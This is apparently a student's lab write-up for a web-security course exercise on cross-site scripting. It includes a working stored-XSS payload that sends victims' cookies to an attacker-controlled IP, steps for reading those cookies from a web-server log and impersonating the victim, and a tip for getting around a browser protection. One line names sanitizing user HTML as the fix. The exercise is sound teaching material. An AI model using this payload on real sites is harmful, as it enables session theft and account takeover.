2300_xss

setup hacker webserver
add comment on vulnerable page with following content (replace IP):
```
<script>
  (() => {
  const IP = "10.201.0.170";
  new Image().src=`http://${IP}/_INFO__${escape(document.cookie)}__`
  })()
</script>
```
- script content is wrapped in anonymous function, as variable declaration may clash with others (actually happend when another hacker forged an xss attack)
read cookies from apache log (/opt/applic/httpd/logs/access_log)
set cookies and impersonate victim
additional remark: Chrome is actually preventing this specific xss, as it is rerouting the request via https, firefox on the other hand is not. This can get circumvented by constructing the hacker webserver with https
see 2300_1.png to 2300_4.png for demonstration purpose

ban or escape (sanitize) html content in user generated parts (comments, username, etc)

2300 Web Security: Cross Site Scripting